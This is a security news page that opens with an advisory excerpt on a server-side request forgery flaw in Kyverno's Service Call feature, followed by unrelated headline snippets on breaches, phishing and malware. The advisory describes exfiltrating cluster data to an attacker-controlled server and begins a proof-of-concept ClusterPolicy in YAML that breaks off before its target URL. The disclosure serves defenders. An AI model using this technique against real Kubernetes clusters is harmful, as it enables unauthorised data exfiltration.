Latest News
### Summary

An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use the Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data.

### Details

According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster.

https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls

### PoC

Create a slightly modified ClusterPolicy based on the one in the documentation. In the `url` we specify the address of a server controlled by the attacker, for example Burp Collaborator.

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: check-namespaces
spec:
  rules:
  - name: call-extension
    match:
      any:
      - resources:
          kinds:
          - ConfigMap
    context:
    - name: result
      apiCall:
        method: P...
```
Intelligence from encrypted platforms like Sky ECC and ANOM has led to the arrest of 232 individuals and…
The remediated flaw gave adversaries a way to maintain access to the app through password resets.
Bad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.
Researchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.
Keeping up with crypto tax laws in Europe feels like a constant hurdle. Regulations evolve, tax authorities demand…
4chan is down amid claims from a rival Soyjak forum user who says they’ve breached the site and…
Though the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.
Customer data such as birth dates, credit card numbers, and driver's license information were stolen when threat actors exploited zero-day vulnerabilities in Cleo-managed file-transfer products.
CloudSEK uncovers a sophisticated malware campaign where attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer. Learn how…